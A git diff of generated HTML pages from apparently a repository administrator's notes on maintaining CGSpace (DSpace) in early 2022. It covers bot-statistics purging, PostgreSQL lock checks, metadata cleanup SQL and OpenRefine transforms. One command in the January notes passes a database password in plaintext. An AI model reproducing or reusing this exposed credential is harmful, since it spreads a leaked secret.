                                                                                                                                                                                                                                                                                                                                                                                        +Purging 2688 hits from 45.134.26.171 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1130 hits from 45.146.164.123 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 536 hits from 45.155.205.231 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 10676 hits from 195.54.167.122 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1350 hits from 54.76.137.83 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1240 hits from 34.253.119.85 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 2879 hits from 34.216.201.131 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 2909 hits from 54.203.193.46 in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                        +Total number of bot hits purged: 37959
                                                                                                                                                                                                                                                                                                                                                                                        +
diff --git a/docs/2022-01/index.html b/docs/2022-01/index.html
index 61f46d82c..2d0570d4b 100644
--- a/docs/2022-01/index.html
+++ b/docs/2022-01/index.html
@@ -24,7 +24,7 @@ Start a full harvest on AReS
 Start a full harvest on AReS
 "/>
-
+
@@ -122,12 +122,12 @@ Start a full harvest on AReS
                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                    $ cat 2022-01-06-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                    -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                    -"Jones, Chris","Chris Jones: 0000-0001-9096-9728"
                                                                                                                                                                                                                                                                                                                                                                                    -"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
                                                                                                                                                                                                                                                                                                                                                                                    -$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' 
                                                                                                                                                                                                                                                                                                                                                                                    -

                                                                                                                                                                                                                                                                                                                                                                                    2022-01-09

                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                    $ cat 2022-01-06-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                    +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                    +"Jones, Chris","Chris Jones: 0000-0001-9096-9728"
                                                                                                                                                                                                                                                                                                                                                                                    +"Jones, Christopher S.","Chris Jones: 0000-0001-9096-9728"
                                                                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' 
                                                                                                                                                                                                                                                                                                                                                                                    +

                                                                                                                                                                                                                                                                                                                                                                                    2022-01-09

                                                                                                                                                                                                                                                                                                                                                                                    • Validate and register CGSpace on OpenArchives
@@ -147,21 +147,21 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63
                                                                                                                                                                                                                                                                                                                                                                                        • I tried to re-build the Docker image for OpenRXV and got an error in the backend:
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        ...
                                                                                                                                                                                                                                                                                                                                                                                        -> openrxv-backend@0.0.1 build
                                                                                                                                                                                                                                                                                                                                                                                        -> nest build
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
                                                                                                                                                                                                                                                                                                                                                                                        -                 ~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                                        -node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
                                                                                                                                                                                                                                                                                                                                                                                        -                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                        -Found 2 error(s).
                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          ...
                                                                                                                                                                                                                                                                                                                                                                                          +> openrxv-backend@0.0.1 build
                                                                                                                                                                                                                                                                                                                                                                                          +> nest build
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          +node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          +2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
                                                                                                                                                                                                                                                                                                                                                                                          +                 ~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                                          +node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          +3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
                                                                                                                                                                                                                                                                                                                                                                                          +                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          +Found 2 error(s).
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          • Ah, it seems the code on the server was slightly out of date
                                                                                                                                                                                                                                                                                                                                                                                            • I checked out the latest master branch and it built
@@ -180,20 +180,20 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                          -      1 
                                                                                                                                                                                                                                                                                                                                                                                          -      1 ------------------
                                                                                                                                                                                                                                                                                                                                                                                          -      1 (3506 rows)
                                                                                                                                                                                                                                                                                                                                                                                          -      1  application_name 
                                                                                                                                                                                                                                                                                                                                                                                          -      9  psql
                                                                                                                                                                                                                                                                                                                                                                                          -     10  
                                                                                                                                                                                                                                                                                                                                                                                          -   3487  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                            +      1 
                                                                                                                                                                                                                                                                                                                                                                                            +      1 ------------------
                                                                                                                                                                                                                                                                                                                                                                                            +      1 (3506 rows)
                                                                                                                                                                                                                                                                                                                                                                                            +      1  application_name 
                                                                                                                                                                                                                                                                                                                                                                                            +      9  psql
                                                                                                                                                                                                                                                                                                                                                                                            +     10  
                                                                                                                                                                                                                                                                                                                                                                                            +   3487  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            • As before, I see messages from PostgreSQL about processes waiting for locks since I enabled the log_lock_waits setting last month:
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            $ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                                                            -12
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              $ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                                                              +12
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              • I set a system alert on DSpace and then restarted the server
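The lock-wait count above can also be broken down per day, which helps show whether the waits cluster around one incident. This is a minimal Python sketch, assuming each log line begins with an ISO date as the grep pattern implies. The function name and the sample lines are hypothetical, not taken from the real log:

```python
from collections import Counter

def count_lock_waits(lines, month_prefix):
    """Count 'still waiting for' messages per day for lines starting with month_prefix."""
    per_day = Counter()
    for line in lines:
        # startswith() sidesteps a regex pitfall: in a pattern like '^2022-01*'
        # the '*' applies to the preceding '1', so it would also match '2022-02'.
        if line.startswith(month_prefix) and "still waiting for" in line:
            per_day[line[:10]] += 1  # the first 10 characters are YYYY-MM-DD
    return per_day

# Hypothetical sample lines for illustration only
sample = [
    "2022-01-18 10:00:01.123 UTC [1234] LOG:  process 1234 still waiting for ShareLock on transaction 5678 after 1000.123 ms",
    "2022-01-18 10:00:02.456 UTC [1235] LOG:  process 1235 acquired ShareLock on transaction 5678 after 2000.456 ms",
    "2022-02-01 09:00:00.000 UTC [1236] LOG:  process 1236 still waiting for ShareLock on transaction 9999 after 1000.001 ms",
]
waits = count_lock_waits(sample, "2022-01-")
print(sum(waits.values()), dict(waits))
```

Passing the full `2022-01-` prefix keeps lines from other months out of the total.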

                                                                                                                                                                                                                                                                                                                                                                                              2022-01-20

                                                                                                                                                                                                                                                                                                                                                                                              @@ -204,8 +204,8 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile=./2022-01-20-green-covers.map
                                                                                                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                                                                                                          2022-01-21

                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile=./2022-01-20-green-covers.map
                                                                                                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                                                                                                          2022-01-21

                                                                                                                                                                                                                                                                                                                                                                                          • Start working on the rest of the ~980 CGIAR TAC and ICW documents from Gaia
                                                                                                                                                                                                                                                                                                                                                                                              @@ -243,21 +243,21 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
                                                                                                                                                                                                                                                                                                                                                                                            • Normalize the metadata text_lang attributes on CGSpace database:
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                                                                                                                            - text_lang |  count  
                                                                                                                                                                                                                                                                                                                                                                                            ------------+---------
                                                                                                                                                                                                                                                                                                                                                                                            - en_US     | 2803350
                                                                                                                                                                                                                                                                                                                                                                                            - en        |    6232
                                                                                                                                                                                                                                                                                                                                                                                            -           |    3200
                                                                                                                                                                                                                                                                                                                                                                                            - fr        |       2
                                                                                                                                                                                                                                                                                                                                                                                            - vn        |       2
                                                                                                                                                                                                                                                                                                                                                                                            - 92        |       1
                                                                                                                                                                                                                                                                                                                                                                                            - sp        |       1
                                                                                                                                                                                                                                                                                                                                                                                            -           |       0
                                                                                                                                                                                                                                                                                                                                                                                            -(8 rows)
                                                                                                                                                                                                                                                                                                                                                                                            -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '92', '');
                                                                                                                                                                                                                                                                                                                                                                                            -UPDATE 9433
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                                                                                                                              + text_lang |  count  
                                                                                                                                                                                                                                                                                                                                                                                              +-----------+---------
                                                                                                                                                                                                                                                                                                                                                                                              + en_US     | 2803350
                                                                                                                                                                                                                                                                                                                                                                                              + en        |    6232
                                                                                                                                                                                                                                                                                                                                                                                              +           |    3200
                                                                                                                                                                                                                                                                                                                                                                                              + fr        |       2
                                                                                                                                                                                                                                                                                                                                                                                              + vn        |       2
                                                                                                                                                                                                                                                                                                                                                                                              + 92        |       1
                                                                                                                                                                                                                                                                                                                                                                                              + sp        |       1
                                                                                                                                                                                                                                                                                                                                                                                              +           |       0
                                                                                                                                                                                                                                                                                                                                                                                              +(8 rows)
                                                                                                                                                                                                                                                                                                                                                                                              +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '92', '');
                                                                                                                                                                                                                                                                                                                                                                                              +UPDATE 9433
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              • Then export the WLE Journal Articles collection again so there are fewer columns to mess with

                                                                                                                                                                                                                                                                                                                                                                                              2022-01-26

                                                                                                                                                                                                                                                                                                                                                                                              @@ -273,7 +273,7 @@ UPDATE 9433
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          cells['dcterms.bibliographicCitation[en_US]'].value.split("doi: ")[1]
                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                          cells['dcterms.bibliographicCitation[en_US]'].value.split("doi: ")[1]
                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                          • I also spent a bit of time cleaning up ILRI Journal Articles, but I notice that we don’t put DOIs in the citation so it’s not possible to fix items that are missing DOIs that way
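The `split("doi: ")[1]` expression above raises an error on any citation that lacks the `doi: ` marker, which is the case described for ILRI Journal Articles. A more defensive version can be sketched in plain Python, independent of the tool that evaluates the `cells[...]` expression. The function name, the sample citations, and the trailing-period cleanup are assumptions for illustration:

```python
def doi_from_citation(citation, marker="doi: "):
    """Return the text after the DOI marker, or None if the marker is absent."""
    if not citation:
        return None
    # partition() never raises, unlike split(marker)[1] when the marker is missing
    _, found, rest = citation.partition(marker)
    if not found:
        return None
    # Assumption: a trailing period belongs to the citation, not to the DOI
    doi = rest.strip().rstrip(".")
    return doi or None

# Hypothetical citations for illustration only
with_doi = "Author, A. 2020. Some title. Journal 1(2): 3-4. doi: 10.1234/example.5678"
without_doi = "Author, B. 2019. Another title. Journal 5(6): 7-8."
print(doi_from_citation(with_doi))
print(doi_from_citation(without_doi))
```

Returning `None` for citations without a marker makes it possible to filter those items out and handle them separately.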
                                                                                                                                                                                                                                                                                                                                                                                              @@ -286,17 +286,17 @@ UPDATE 9433
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                          -      1 
                                                                                                                                                                                                                                                                                                                                                                                          -      1 ------------------
                                                                                                                                                                                                                                                                                                                                                                                          -      1 (537 rows)
                                                                                                                                                                                                                                                                                                                                                                                          -      1  application_name 
                                                                                                                                                                                                                                                                                                                                                                                          -      9  psql
                                                                                                                                                                                                                                                                                                                                                                                          -     51  dspaceApi
                                                                                                                                                                                                                                                                                                                                                                                          -    477  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                          -$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                                                          -3
                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                            +      1 
                                                                                                                                                                                                                                                                                                                                                                                            +      1 ------------------
                                                                                                                                                                                                                                                                                                                                                                                            +      1 (537 rows)
                                                                                                                                                                                                                                                                                                                                                                                            +      1  application_name 
                                                                                                                                                                                                                                                                                                                                                                                            +      9  psql
                                                                                                                                                                                                                                                                                                                                                                                            +     51  dspaceApi
                                                                                                                                                                                                                                                                                                                                                                                            +    477  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                            +$ grep -E '^2022-01*' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                                                            +3
                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                            • I set a system alert on CGSpace and then restarted Tomcat and PostgreSQL
                                                                                                                                                                                                                                                                                                                                                                                              • The issue in Francesca’s case was actually that someone had taken the task, not that PostgreSQL transactions were locked!
                                                                                                                                                                                                                                                                                                                                                                                              • @@ -344,19 +344,19 @@ $ grep -E '^2022-01*' /var/log/postgr
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                            value.contains(/:\s?\d+(-|–)\d+/)
                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              value.contains(/:\s?\d+(-|–)\d+/)
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              • Then I faceted by blank on dcterms.extent and did a transform to extract the page information for over 1,000 items!
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              'p. ' +
                                                                                                                                                                                                                                                                                                                                                                                              -cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[0] +
                                                                                                                                                                                                                                                                                                                                                                                              -'-' +
                                                                                                                                                                                                                                                                                                                                                                                              -cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[2]
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                'p. ' +
                                                                                                                                                                                                                                                                                                                                                                                                +cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[0] +
                                                                                                                                                                                                                                                                                                                                                                                                +'-' +
                                                                                                                                                                                                                                                                                                                                                                                                +cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[2]
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                • Then I did similar for cg.volume and cg.issue, also based on the citation, for example to extract the “16” from “Journal of Blah 16(1)”, where “16” is the second capture group in a zero-based match:
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  • This was 3,000 items so I imported the changes on CGSpace 1,000 at a time…
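The GREL transforms above can be sanity-checked outside OpenRefine. This is only a sketch in Python, not what was run on CGSpace: the function names and the sample citation are hypothetical, and Python numbers capture groups from 1, whereas the GREL `match()` array is zero-based, so GREL's `[0]`, `[1]`, and `[2]` correspond to `group(1)`, `group(2)`, and `group(3)` here.

```python
import re

# Same patterns as the GREL expressions, compiled once.
PAGES = re.compile(r".*:\s?(\d+)(-|–)(\d+).*")
VOLUME_ISSUE = re.compile(r".*( |;)(\d+)\((\d+)\).*")


def extract_extent(citation):
    """Return 'p. <first>-<last>' from a citation, or None if no page range is found."""
    m = PAGES.match(citation)
    if m is None:
        return None
    # group(1) is the first page, group(3) the last page (GREL indexes 0 and 2)
    return "p. " + m.group(1) + "-" + m.group(3)


def extract_volume_issue(citation):
    """Return (volume, issue) from text like 'Journal of Blah 16(1)', or None."""
    m = VOLUME_ISSUE.match(citation)
    if m is None:
        return None
    # group(2) is the volume (GREL index 1), group(3) the issue (GREL index 2)
    return m.group(2), m.group(3)


if __name__ == "__main__":
    # Hypothetical citation, for illustration only
    sample = "Doe, J. 2020. A title. Journal of Blah 16(1): 123-145."
    print(extract_extent(sample))
    print(extract_volume_issue(sample))
```

Returning `None` for citations that do not match mirrors the reason for first filtering with `value.contains(...)` in OpenRefine: the transform should only touch rows where the pattern is actually present.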
                                                                                                                                                                                                                                                                                                                                                                                                  diff --git a/docs/2022-02/index.html b/docs/2022-02/index.html index ef4491673..f60e6c3fe 100644 --- a/docs/2022-02/index.html +++ b/docs/2022-02/index.html @@ -38,7 +38,7 @@ We agreed to try to do more alignment of affiliations/funders with ROR "/> - + @@ -138,44 +138,44 @@ We agreed to try to do more alignment of affiliations/funders with ROR
                                                                                                                                                                                                                                                                                                                                                                                                  • I moved a bunch of communities:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ dspace community-filiator --remove --parent=10568/114639 --child=10568/115089
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115087
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10568/108598
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10947/1
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/35697 --child=10568/80211
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/89416
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/3530
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/80099
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/80100
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/97114 --child=10568/34494
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117867 --child=10568/114644
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117867 --child=10568/16573
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117867 --child=10568/42211
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/109945
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/16498
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/99453
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/2983
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/133
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10568/1208
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/1208
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10568/56924
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10568/117865 --child=10568/56924
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10947/1 --child=10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                  -$ dspace community-filiator --set --parent=10947/1 --child=10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    $ dspace community-filiator --remove --parent=10568/114639 --child=10568/115089
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/114639 --child=10568/115087
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10568/108598
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10947/1
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/35697 --child=10568/80211
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/89416
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/3530
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/80099
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/80100
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/97114 --child=10568/34494
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117867 --child=10568/114644
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117867 --child=10568/16573
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117867 --child=10568/42211
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/109945
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/16498
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/99453
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/2983
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/133
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10568/1208
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/1208
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10568/56924
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10568/117865 --child=10568/56924
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10947/1 --child=10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --remove --parent=10568/83389 --child=10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                    +$ dspace community-filiator --set --parent=10947/1 --child=10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    • Remove CPWF and CTA subjects from the Discovery facets
                                                                                                                                                                                                                                                                                                                                                                                                    • Start a full Discovery index on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                    -
